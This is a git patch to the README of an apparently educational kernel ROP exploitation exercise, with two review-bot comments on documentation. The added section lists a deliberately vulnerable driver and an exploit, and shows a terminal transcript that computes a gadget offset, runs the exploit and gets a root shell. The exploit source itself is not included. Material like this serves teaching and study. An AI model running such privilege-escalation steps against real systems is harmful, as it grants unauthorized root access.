From 29f751183fa7423b8fb3fd163222928ea7ef6f5c Mon Sep 17 00:00:00 2001 From: Hashcrack Date: Thu, 23 Jun 2016 10:29:49 +1000 Subject: [PATCH] updated readme --- README.md | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) diff --git a/README.md b/README.md index 448eff4..a4c2c4c 100644 --- a/README.md +++ b/README.md @@ -13,6 +13,8 @@ the function address to be executed. * drv.c - vulnerable kernel driver * trigger.c - user-space application to trigger the OOB access via the provided ioctl +* find_offset.py - helper script for finding the correct offset into the "ops" array +* rop_exploit.c - ROP exploit for the "drv.c" kernel driver The goal is to construct and execute a ROP chain that will satisfy the following requirements: @@ -21,3 +23,20 @@ following requirements: * Data residing in user space may be referenced (i.e., "fetching" data from user space is allowed) * Instructions residing in user space may not be executed + +``` +vnik@ubuntu:~$ dmesg | grep addr | grep ops +[ 244.142035] addr(ops) = ffffffffa02e9340 +vnik@ubuntu:~$ ~/find_offset.py ffffffffa02e9340 ~/gadgets +offset = 18446744073644231139 +gadget = xchg eax, esp ; ret 0x11e8 +stack addr = 8108e258 + +vnik@ubuntu:~/kernel_rop/vulndrv$ gcc rop_exploit.c -O2 -o rop_exploit +vnik@ubuntu:~/kernel_rop/vulndrv$ ./rop_exploit 18446744073644231139 ffffffffa02e9340 +array base address = 0xffffffffa02e9340 +stack address = 0x8108e258 +# id +uid=0(root) gid=0(root) groups=0(root) +# +```
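Review bot: In the first hunk, the new `find_offset.py` entry says the script finds the offset into the "ops" array but leaves its inputs undocumented, while the transcript in the second hunk invokes it as `~/find_offset.py ffffffffa02e9340 ~/gadgets`. The bullet should state that it takes the `addr(ops)` value from `dmesg` and a gadgets file, and say where that gadgets file comes from; since the script is run directly rather than via `python`, also confirm it carries a shebang and is committed with the executable bit set.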
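Review bot: In the second hunk, the fenced block has no language tag and the sample values are presented without saying they are specific to one module load. Tagging the fence (for example ```console) makes the README render it as a terminal transcript, and a sentence before it should note that `addr(ops)` is read from `dmesg` after loading `drv.c` and that the offset passed to `./rop_exploit` is derived from that address by `find_offset.py`, so both values must be recomputed rather than copied from the example; a line showing how `drv.c` is built and loaded would also close the gap between the file list and the transcript.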